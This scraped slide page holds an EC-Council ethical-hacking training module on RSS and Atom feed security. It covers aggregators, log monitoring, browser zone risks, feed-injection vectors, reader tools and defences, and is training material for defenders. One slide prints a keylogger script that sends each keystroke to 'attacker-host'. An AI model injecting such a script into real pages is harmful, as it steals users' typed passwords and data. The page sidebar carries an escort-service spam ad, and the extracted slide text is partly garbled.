HCV-2/4/8: TT báo cháy 2,4,8 kênhVi Tính Hoàng Nam
 

More from Vi Tính Hoàng Nam (20)

CATALOG KBVISION (Tiếng Việt)
CATALOG KBVISION (Tiếng Việt)CATALOG KBVISION (Tiếng Việt)
CATALOG KBVISION (Tiếng Việt)
 
Catalogue 2015
Catalogue 2015Catalogue 2015
Catalogue 2015
 
Tl wr740 n-v4_user_guide_1910010682_vn
Tl wr740 n-v4_user_guide_1910010682_vnTl wr740 n-v4_user_guide_1910010682_vn
Tl wr740 n-v4_user_guide_1910010682_vn
 
CATALOGUE CAMERA GIÁM SÁT
CATALOGUE CAMERA GIÁM SÁTCATALOGUE CAMERA GIÁM SÁT
CATALOGUE CAMERA GIÁM SÁT
 
HƯỚNG DẪN SỬ DỤNG ĐẦU GHI QTD-6108
HƯỚNG DẪN SỬ DỤNG ĐẦU GHI QTD-6108HƯỚNG DẪN SỬ DỤNG ĐẦU GHI QTD-6108
HƯỚNG DẪN SỬ DỤNG ĐẦU GHI QTD-6108
 
Các loại cáp mạng
Các loại cáp mạngCác loại cáp mạng
Các loại cáp mạng
 
Catalogue 10-2014-new
Catalogue 10-2014-newCatalogue 10-2014-new
Catalogue 10-2014-new
 
Camera QTX-1210
Camera QTX-1210Camera QTX-1210
Camera QTX-1210
 
Brochua đầu ghi hình QTD-6100 Series
Brochua đầu ghi hình QTD-6100 SeriesBrochua đầu ghi hình QTD-6100 Series
Brochua đầu ghi hình QTD-6100 Series
 
NSRT: Dụng cụ tháo đầu báo
NSRT: Dụng cụ tháo đầu báoNSRT: Dụng cụ tháo đầu báo
NSRT: Dụng cụ tháo đầu báo
 
SLV-24N: Đầu báo khói quang
SLV-24N: Đầu báo khói quangSLV-24N: Đầu báo khói quang
SLV-24N: Đầu báo khói quang
 
SLV-24N: Đầu báo khói quang
SLV-24N: Đầu báo khói quangSLV-24N: Đầu báo khói quang
SLV-24N: Đầu báo khói quang
 
PEX-xx: Bộ hiển thị phụ 5-210 zone cho tủ RPP, RPS, RPQ
PEX-xx: Bộ hiển thị phụ 5-210 zone cho tủ RPP, RPS, RPQPEX-xx: Bộ hiển thị phụ 5-210 zone cho tủ RPP, RPS, RPQ
PEX-xx: Bộ hiển thị phụ 5-210 zone cho tủ RPP, RPS, RPQ
 
HRA-1000: Hiển thị phụ cho TT HCP-1008E
HRA-1000: Hiển thị phụ cho TT HCP-1008EHRA-1000: Hiển thị phụ cho TT HCP-1008E
HRA-1000: Hiển thị phụ cho TT HCP-1008E
 
RPP-ABW: TT báo cháy 10-20 kênh
RPP-ABW: TT báo cháy 10-20 kênhRPP-ABW: TT báo cháy 10-20 kênh
RPP-ABW: TT báo cháy 10-20 kênh
 
RPP-ECW: TT báo cháy 3-5 kênh
RPP-ECW: TT báo cháy 3-5 kênhRPP-ECW: TT báo cháy 3-5 kênh
RPP-ECW: TT báo cháy 3-5 kênh
 
HCP-1008E: TT báo cháy 8-24 kênh
HCP-1008E: TT báo cháy 8-24 kênhHCP-1008E: TT báo cháy 8-24 kênh
HCP-1008E: TT báo cháy 8-24 kênh
 
HCV-2/4/8: TT báo cháy 2,4,8 kênh
HCV-2/4/8: TT báo cháy 2,4,8 kênhHCV-2/4/8: TT báo cháy 2,4,8 kênh
HCV-2/4/8: TT báo cháy 2,4,8 kênh
 
I phone v1.2_e
I phone v1.2_eI phone v1.2_e
I phone v1.2_e
 
Android v1.3 e
Android v1.3 eAndroid v1.3 e
Android v1.3 e
 

Recently uploaded

Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfjimielynbastida
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfngoud9212
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsSnow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsHyundai Motor Group
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsPrecisely
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxnull - The Open Security Community
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 

Recently uploaded (20)

Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdf
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdf
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsSnow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power Systems
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 
The transition to renewables in India.pdf
The transition to renewables in India.pdfThe transition to renewables in India.pdf
The transition to renewables in India.pdf
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 

Ethical Hacking RSS and Atom Feeds

  • 1. Ethical Hacking and C tCountermeasures Version 6 Mod le LIIModule LII Hacking RSS and Atom
  • 2. Module Objective Thi d l ill f ili i i h • RSS and Atom B ildi F d A t This module will familiarize you with: • Building a Feed Aggregator • Monitoring the Server with Feeds • Tracking Changes in Open Source Projects Ri k b Z• Risks by Zone • Reader Specific Risks • Example for Attacker to Attack the Feeds l• Tools EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
  • 3. Module Flow RSS and Atom Risks by Zone Building a Feed Aggregator Reader Specific Risks Monitoring the Server with Feeds Example for Attacker to Attack the Feeds Tracking Changes in Open Source Projects Tools EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Open Source Projects
  • 4. Introduction RSS (Really Simple Syndication) and Atom is a format for d li i d t d b t tdelivering updated web content RSS and Atom feeds makes easy for the user to surf the Web for any updated information instead of going through eachfor any updated information instead of going through each Website RSS and Atom feeds are collectively called as Syndicationy y feeds These syndication feeds let the user to collect the newThese syndication feeds let the user to collect the new information in their inbox, like email It slices up the Web into timely capsules of microcontent EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited It slices up the Web into timely capsules of microcontent which allows the user to make modifications
  • 5. Areas Where RSS and Atom is UsedUsed Website owners search for dynamic • Provide top content to their users Website owners search for dynamic content to: p • Boost their website traffic and search engine ranking News sites BlBloggers P2P Sites EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
  • 6. Building a Feed Aggregator Finding Feeds to Aggregate • Feeds can be found anywhere on the web page and blogs • A ubiquitous “XML” button link O f h li d “RSS ” “ATOM ” feeds • One of the more stylized “RSS 2.0” or “ATOM 0.3” mini-button Links • Any hyperlink with a direct mention of “RSS” or “Atom” feeds h l k h d d h• A hyperlink that reads “Syndicate this Site” Th th d th h hi h th di t f d Clickable Feed Buttons • The methods through which the syndicate feeds work in a different ways while clicking a feed URL are: • Appropriate MIME-types in Web server configuration EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited pp p yp g • Universal Resource Identifier (URI) scheme in feed URLs
  • 7. Monitoring the Server with Feeds Feeds generated contain very sensitive information about Monitoring Logs your server • A log is a stream of events in chronological order and feeds tend to be a stream of entries in reverse h l i l d g g chronological order • So, it is possible to build a scraper that simply translates log events straight into feed entries • You can monitor the server logs using the feedsg g gathered by scraper Place these feeds built by programs behind password- EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited y p g p protected directories, and, access them only via HTTPS
  • 8. Monitoring the Server with Feeds (cont’d)(cont d) Building Feeds Incrementally • Feed generator manages collection of entries to keep the previous program entries run in the feed Building Feeds Incrementally • Apache log mostly consists of real problems that need fixing at some point based on persistently buggy or chatty software Monitoring Problems in Apache Logs some point based on persistently buggy or chatty software W h h l h h A h l i h Watch for Incoming Links in Apache Logs • Watch the access logs when the Apache error logs are in the aggregator which are more active, jumbled, and noisy than the error logs • This also helps in accessing how people are getting into the site EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited site
  • 9. Tracking Changes in Open Source ProjectsProjects Concurrent Versions System (CVS) and Subversion Repositories are d t it th l t t dditi d i i t j tused to monitor the latest additions and revisions to project source code, and to funnel those events into syndication feed entries Watching Projects in (CVS) Repositories • The essential functions of CVS are: • Check-out • Update Commit• Commit • Finding a CVS Repository • The collection of active Open Source projects is at SourceForge • CVS repository is included among the resources offered by EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited • CVS repository is included among the resources offered by SourceForge
  • 10. Tracking Changes in Open Source Projects (cont’d)Projects (cont d) Watching Projects in Subversion i i • Subversion repositories is an advanced form of CVS I i d Repositories • It introduces: • Atomic commits to prevent from partially checked-ins • Directory versioning to track changes to a project that go beyond source code changesy g EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
  • 11. Risks by Zone: Remote Zone risk The risks involved in this zone are for Web browsers and web based readers Cross-site request forgery: readers • In this, the attacker makes the system to send requests to a website to execute commands Potential to launch attacks: • The attacker can trick the user’s browser into performing web based attacks on their behalf, it may lead to DoS attack or can execute commands if the site is vulnerable • Depending on the developers request to the web library (POST or GET data) the attacker uses this feature of Post data and spam: EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited (POST or GET data), the attacker uses this feature of converting data and spam's the victims of a particular site
  • 12. Risks by Zone: Local Zone Risk The local zone risk arises when the feed is converted to HTMLe oca o e s a ses e t e eed s co e ted to file, stored in a local file, and loaded to Internet explorer instance This will allow the reader to open the file to the local browser’s zone and functionality The functionality has the access to ActiveX objects with permissions to read and write files to disk The other risks involved are access to the XMLHttp and XMLHttpRequest objects typically used by Ajax applications EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited XMLHttpRequest objects typically used by Ajax applications
  • 13. Reader Specific Risks Web reader risks: • Users subscribe to a web-based feed with browsers or local clients • These feeds can be affected by both local and remote• These feeds can be affected by both local and remote zone risks • Online sites, such as Bloglines or Google, provide web- based feed viewers and have remote zone risk • Attackers exploit the vulnerabilities in web based viewers, steal cookies, and perform cross-site scripting attacks • Impact of a feed-based attack increases when the feed Website risks: EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited • Impact of a feed based attack increases when the feed being controlled is syndicated on other web sites
  • 14. Utilizing the Web Feeds VulnerabilitiesVulnerabilities The vulnerabilities in the web • The feed owner is malicious The vulnerabilities in the web feed client can be utilized if: • The feed owner is malicious • The web site which is providing the feed is hacked • The feeds created form mailing lists, bulletin board messages, peer-to-peer (P2P) web sites, BitTorrent sites or user postings on blogs, can be injected with malicious payload • The feed is changed during the transport phase• The feed is changed during the transport phase via proxy cache poisoning EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
  • 15. Example for Attacker to Attack the FeedsFeeds The attacker injects keystroke logging JavaScript on to the website displaying the •<script LANGUAGE="JavaScript"> JavaScript on to the website displaying the feed •document.captureEvents(Event.KEYPRESS); •document.onkeypress = captureKeyStrokes; •function captureKeyStrokes(e) { •var key = String.fromCharCode(e.which);var key String.fromCharCode(e.which); •var img = new Image(); •var src = "http://attacker-host/?" + "keystroke=" + escape(key); •img src src;•img.src = src; •return true;} •</script> EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited It allows an attacker to record everything the user is typing, on every page
  • 16. Example for Attacker to Attack the Feeds (cont’d)Feeds (cont d) EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
  • 17. T lTools EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
  • 18. Perseptio FeedAgent Perseptio FeedAgent is an RSS feed reader that can keep upto date information from the favorite web feedsinformation from the favorite web feeds It adds feeds manually, imports them from OPML files, or selects feeds from the built in directoryfeeds from the built-in directory It includes scoring feature that automatically recommends new news items based on the ratings of previous itemsitems based on the ratings of previous items EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
  • 19. Perseptio FeedAgent: Screenshot EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
  • 20. RssFeedEater RssFeedEater is an RSS Reader that gathers i f ti f i it th t ffinformation from various sites that offer syndicated content The program comes pre-loaded with various feeds in several categories New feeds can be easily created for the favorite sites by simply adding them to a category It provides a clean easy to use interface EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited It provides a clean, easy to use interface
  • 21. RssFeedEater: Screenshot EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
  • 22. Thingamablog Thingamablog is a cross-platform, blogging application, and RSS feed reader It allows to easily publish own weblog without h d f HTML k l dthe need for any HTML knowledge The interface provides a neatly organized overview of the blogs and a word processor like interface to create new entries EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
  • 23. Thingamablog: Screenshot EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
  • 24. RSS Builder RSS Builder is an easy to use program to create or maintain one or more RSS feeds for the web site Interface supports adding topics, links and content, and then upload the .rss fil t th bfile to the web server, using the built-in FTP client EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
  • 25. RSS Submit RSS Submit enables to submit the RSS Feeds to various RSS search enginesengines It also enables to submit multiple feeds at once, and also validate them via a link to an online service EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
  • 26. FeedDemon FeedDemon is a client that can retrieve and organize RSS feeds from the Internetthe Internet It has dozens of pre-configured newsfeeds, and it also allows own feeds by adding the URL for an RSS feed of user’s choicefeeds by adding the URL for an RSS feed of user s choice It offers an attractive and easy to use interface with integrated web browsingbrowsing EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
  • 27. FeedDemon: Screenshot EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
  • 28. FeedForAll FeedForAll enables to easily create, edit, and publish RSS feeds It automatically updates older feeds to conform with RSS 2 0 standardswith RSS 2.0 standards, and supports advanced feed properties EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
  • 29. FeedExpress FeedExpress is an easy to useFeedExpress is an easy to use RSS/RDF client It caches and indexes all theIt caches and indexes all the feeds for each RSS subscription, making it easy to overview all the feeds Refresh time can be set for each feed or all of them Customizes the CSS style appearance EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited appearance
  • 30. RSS and Atom Security The security in RSS and Atom can be d i th • Authentication • Identify the user requesting for the feed done in three ways: • Identify the user requesting for the feed • This can be done by tried-and-true HTTP authentication mechanisms, including Basic and Digest • Authorization • After authentication is completed it can be decided whether the user is allowed to access the requested content E ti• Encryption • Encrypt the content to negate the use by third party sniffers • This can be done by using SSL which protects the web EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited This can be done by using SSL which protects the web server
  • 31. Summary RSS and Atom feeds are collectively called as Syndication feedsRSS and Atom feeds are collectively called as Syndication feeds RSS and Atom feeds makes it easy for the user to surf the Web for any updated information instead of going through each Websitep g g g Feeds can be found any where on the web page and blogs Parsers built on the sites which produces feeds are called Scrapers A log is a stream of events in chronological order Feed generator manages collection of entries to keep the previous EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Feed generator manages collection of entries to keep the previous program entries running in the feed
  • 32. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
  • 33. EC-Council Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited